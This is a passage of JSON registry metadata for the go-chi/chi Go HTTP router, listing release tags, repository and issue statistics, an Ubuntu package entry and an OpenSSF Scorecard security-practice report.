go-chi%2Fchi/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.1.0/manifests"},{"name":"v2.0.0","sha":"54f435d539226571eab1987ed862b1c0fdfdc892","kind":"commit","published_at":"2017-01-06T20:47:52.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v2.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.0.0/manifests"},{"name":"v1.0.0","sha":"dcbb8f81eea01aaaa5b6f9bffc229e9e9e0256bb","kind":"commit","published_at":"2016-06-22T21:59:16.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.0.0/manifests"},{"name":"v0.9.0","sha":"c420d7fbf4428b27e31d83591e5e2267d84f9f20","kind":"commit","published_at":"2016-03-31T13:51:57.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v0.9.0","html_url":"https://github.com/go-chi/chi/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v0.9.0/manifests"}]},"repo_metadata_updated_at":"2026-08-08T10:51:35.089Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":5.199985977522737,"dependent_packages_count":4.87252739548082,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":5.036256686501779},"purl":"pkg:golang/github.com/go-chi/chi/_examples/versions","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/go/github.com/go-chi/chi/_examples/versions","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/go/github.com/go-chi/chi/_examples/versions","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/go/github.com/go-chi/chi/_examples/versions/dependencies","status":null,"funding_links":["https://github.com/sponsors/pkieltyka"],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-05T21:35:35.662Z","issues_count":173,"pull_requests_count":264,"avg_time_to_close_issue":12477255.268518519,"avg_time_to_close_pull_request":9586229.069148935,"issues_closed_count":108,"pull_requests_closed_count":187,"pull_request_authors_count":141,"issue_authors_count":161,"avg_comments_per_issue":3.098265895953757,"avg_comments_per_pull_request":0.9204545454545454,"merged_pull_requests_count":106,"bot_issues_count":0,"bot_pull_requests_count":0,"past_year_issues_count":13,"past_year_pull_requests_count":81,"past_year_avg_time_to_close_issue":2306211.8,"past_year_avg_time_to_close_pull_request":2561033.4146341463,"past_year_issues_closed_count":10,"past_year_pull_requests_closed_count":41,"past_year_pull_request_authors_count":52,"past_year_issue_authors_count":12,"past_year_avg_comments_per_issue":1.6153846153846154,"past_year_avg_comments_per_pull_request":0.49382716049382713,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":0,"past_year_merged_pull_requests_count":13,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/issues","maintainers":[{"login":"pkieltyka","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pkieltyka"},{"login":"bigwheel","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bigwheel"}],"active_maintainers":[]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fgo-chi%2Fchi%2F_examples%2Fversions/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fgo-chi%2Fchi%2F_examples%2Fversions/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fgo-chi%2Fchi%2F_examples%2Fversions/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fgo-chi%2Fchi%2F_examples%2Fversions/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fgo-chi%2Fchi%2F_examples%2Fversions/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fgo-chi%2Fchi%2F_examples%2Fversions/codemeta","maintainers":[],"registry":{"name":"proxy.golang.org","url":"https://proxy.golang.org","ecosystem":"go","default":true,"packages_count":2263070,"maintainers_count":0,"namespaces_count":837425,"keywords_count":122443,"github":"golang","metadata":{"funded_packages_count":65362,"sync_missing_packages_cursor":{"timestamp":"2026-08-12T00:18:10.975284Z","path":"github.com/fhunleth/muontrap","version":"v0.2.1"},"rate_limit":1},"icon_url":"https://github.com/golang.png","created_at":"2022-04-04T15:19:22.939Z","updated_at":"2026-08-12T12:33:12.528Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/namespaces"}},{"id":13417501,"name":"golang-github-go-chi-chi","ecosystem":"ubuntu","description":null,"homepage":"https://github.com/go-chi/chi","licenses":"mit","normalized_licenses":[],"repository_url":"https://github.com/go-chi/chi","keywords_array":["universe/golang"],"namespace":"universe","versions_count":1,"first_release_published_at":"2026-02-07T03:12:18.473Z","latest_release_published_at":"2026-02-07T03:12:18.473Z","latest_release_number":"5.0.7-1","last_synced_at":"2026-03-07T03:36:12.530Z","created_at":"2026-02-07T03:12:17.903Z","updated_at":"2026-08-08T10:51:35.071Z","registry_url":"https://launchpad.net/ubuntu/+source/golang-github-go-chi-chi","install_command":"apt-get install golang-github-go-chi-chi","documentation_url":null,"metadata":{"component":"universe","architecture":"all","priority":"optional","binary":"golang-github-go-chi-chi-dev","standards_version":"4.5.1","maintainer":"Debian Go Packaging Team \u003cteam+pkg-go@tracker.debian.org\u003e","build_depends":"debhelper-compat (= 12), dh-golang, golang-any","build_depends_indep":null,"build_depends_arch":null},"repo_metadata":{"id":37431049,"uuid":"44344606","full_name":"go-chi/chi","owner":"go-chi","description":"lightweight, idiomatic and composable router for building Go HTTP services","archived":false,"fork":false,"pushed_at":"2026-07-06T14:32:43.000Z","size":3855,"stargazers_count":22647,"open_issues_count":113,"forks_count":1143,"subscribers_count":202,"default_branch":"master","last_synced_at":"2026-08-08T05:52:46.865Z","etag":null,"topics":["api","context","go","golang","http","microservices","middleware","rest-api","router"],"latest_commit_sha":null,"homepage":"https://go-chi.io","language":"Go","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/go-chi.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":"CONTRIBUTING.md","funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null},"funding":{"github":["pkieltyka"],"patreon":null,"open_collective":null,"ko_fi":null,"tidelift":null,"community_bridge":null,"liberapay":null,"issuehunt":null,"otechie":null,"custom":null}},"created_at":"2015-10-15T20:46:29.000Z","updated_at":"2026-08-08T05:10:38.000Z","dependencies_parsed_at":"2024-02-17T01:25:55.324Z","dependency_job_id":"9318de72-9c7f-4385-92f6-00246e08d3a4","html_url":"https://github.com/go-chi/chi","commit_stats":{"total_commits":679,"total_committers":142,"mean_commits":4.78169014084507,"dds":0.6244477172312224,"last_synced_commit":"ef31c0bff3f8061e6fba7085691e4970a3d1b7da"},"previous_names":["pressly/chi"],"tags_count":59,"template":false,"template_full_name":null,"purl":"pkg:github/go-chi/chi","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/go-chi","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/sbom","scorecard":{"id":431500,"data":{"date":"2025-08-11","repo":{"name":"github.com/go-chi/chi","commit":"23c395f8524a30334126ca16fb4d37b88745b9b9"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.7,"checks":[{"name":"Code-Review","score":8,"reason":"Found 25/30 approved changesets -- score normalized to 8","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Maintained","score":3,"reason":"4 commit(s) and 0 issue activity found in the last 90 days -- score normalized to 3","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: no topLevel permission defined: .github/workflows/ci.yml:1","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Pinned-Dependencies","score":3,"reason":"dependency not pinned by hash detected -- score normalized to 3","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/go-chi/chi/ci.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/go-chi/chi/ci.yml/master?enable=pin","Info:   0 out of   2 GitHub-owned GitHubAction dependencies pinned","Info:   1 out of   1 goCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Vulnerabilities","score":9,"reason":"1 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GO-2025-3770 / GHSA-vrw8-fxc6-2r93"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 29 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}}]},"last_synced_at":"2025-08-19T03:27:31.106Z","repository_id":37431049,"created_at":"2025-08-19T03:27:31.106Z","updated_at":"2025-08-19T03:27:31.106Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36403979,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-06T04:43:03.162Z","status":"online","status_checked_at":"2026-08-08T02:00:08.763Z","response_time":96,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"go-chi","name":"go-chi","uuid":"29575368","kind":"organization","description":"","email":null,"website":null,"location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/29575368?v=4","repositories_count":17,"last_synced_at":"2023-02-26T15:55:10.593Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/go-chi","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-10T02:33:16.133Z","updated_at":"2023-02-26T15:55:10.598Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/go-chi","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/go-chi/repositories"},"tags":[{"name":"v5.3.1","sha":"8b258c7bb28f97a5f2a856ff7ef962578fec9215","kind":"commit","published_at":"2026-07-05T18:51:45.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.3.1","html_url":"https://github.com/go-chi/chi/releases/tag/v5.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.3.1/manifests"},{"name":"v5.3.0","sha":"3b171578ca44dfd75ca3c5cbddc7b44c600a7b49","kind":"commit","published_at":"2026-05-22T15:16:13.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.3.0","html_url":"https://github.com/go-chi/chi/releases/tag/v5.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.3.0/manifests"},{"name":"v5.2.5","sha":"05f1ef7bb50b8a8cb33a9dd3ba1c5b94bff0f723","kind":"commit","published_at":"2026-02-05T11:05:34.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.5","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.5/manifests"},{"name":"v5.2.4","sha":"6eb35881c0e438ffb663ddbad3a61babaa5e5d8a","kind":"commit","published_at":"2026-01-14T16:02:00.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.4","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.4/manifests"},{"name":"v5.2.3","sha":"9b9fb55def404397748a9fc7e044efe9db1d618e","kind":"commit","published_at":"2025-08-26T17:56:01.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.3","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.3/manifests"},{"name":"v5.2.2","sha":"23c395f8524a30334126ca16fb4d37b88745b9b9","kind":"commit","published_at":"2025-06-20T12:21:10.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.2","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.2/manifests"},{"name":"v5.2.1","sha":"71307f9b7e4e9527638bc951c42b782cd1560331","kind":"commit","published_at":"2025-01-20T20:41:44.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.1","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.1/manifests"},{"name":"v5.2.0","sha":"0a20a0e3400e551803f463d17a0ab84ee8afef3c","kind":"commit","published_at":"2024-12-14T17:06:53.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.0","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.0/manifests"},{"name":"v5.1.0","sha":"67be7d9cafdaeb4e04e887ff78d09e030ee43b00","kind":"commit","published_at":"2024-06-28T14:29:27.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.1.0","html_url":"https://github.com/go-chi/chi/releases/tag/v5.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.1.0/manifests"},{"name":"v5.0.14","sha":"7957c0d4ddaee560a01110145dbf2809ffdb6663","kind":"commit","published_at":"2024-06-21T12:30:42.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.14","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.14/manifests"},{"name":"v5.0.13","sha":"f10dc4a9cab53a47f600f518fcccaa044666e95f","kind":"commit","published_at":"2024-06-07T23:13:37.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.13","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.13/manifests"},{"name":"v5.0.12","sha":"1191921289e82fdc56f298a76ff254742f568ece","kind":"commit","published_at":"2024-02-17T00:24:11.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.12","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.12/manifests"},{"name":"v5.0.11","sha":"fcdb1329609a395afb1dac4c5f2bc777b35f0f17","kind":"commit","published_at":"2023-12-20T02:35:01.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.11","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.11/manifests"},{"name":"v4.1.3","sha":"da7ce9468546b9c352b0c7eac3580961543d0d96","kind":"commit","published_at":"2023-09-07T09:47:57.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.1.3","html_url":"https://github.com/go-chi/chi/releases/tag/v4.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.3/manifests"},{"name":"v3.3.5","sha":"8f7c7827792ffe0506ef6bf0d2e85d1ddfd89a20","kind":"commit","published_at":"2023-09-07T09:46:43.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.5","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.5/manifests"},{"name":"v2.1.1","sha":"052d563ff595f7c360284be323a8ef4c41e1d761","kind":"commit","published_at":"2023-09-07T09:44:41.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v2.1.1","html_url":"https://github.com/go-chi/chi/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.1.1/manifests"},{"name":"v1.5.5","sha":"bbb989dcdf2943dd4cc8bc3381057cb632d1e73e","kind":"commit","published_at":"2023-09-07T09:35:12.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.5","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.5/manifests"},{"name":"v5.0.10","sha":"99bc99e0bf0edc147e82765f2848167922a5c644","kind":"commit","published_at":"2023-07-13T16:01:44.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.10","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.10/manifests"},{"name":"v5.0.9","sha":"cfd6c464dacfc6199e3f6155faf9cb3e57be0a95","kind":"commit","published_at":"2023-07-13T15:37:56.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.9","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.9/manifests"},{"name":"v5.0.8","sha":"da69873df486639c64f3b1f90abf69c943c17554","kind":"commit","published_at":"2022-12-07T13:23:23.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.8","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.8/manifests"},{"name":"v5.0.7","sha":"0316d5a1df8598eceb137f5f77945be56810b564","kind":"commit","published_at":"2021-11-18T21:56:43.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.7","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.7/manifests"},{"name":"v5.0.6","sha":"66d6a4d9814d8d8a3816c730e18f5219f263412b","kind":"commit","published_at":"2021-11-15T21:30:54.000Z","download_url":"https://codeload.github.com/go-chi/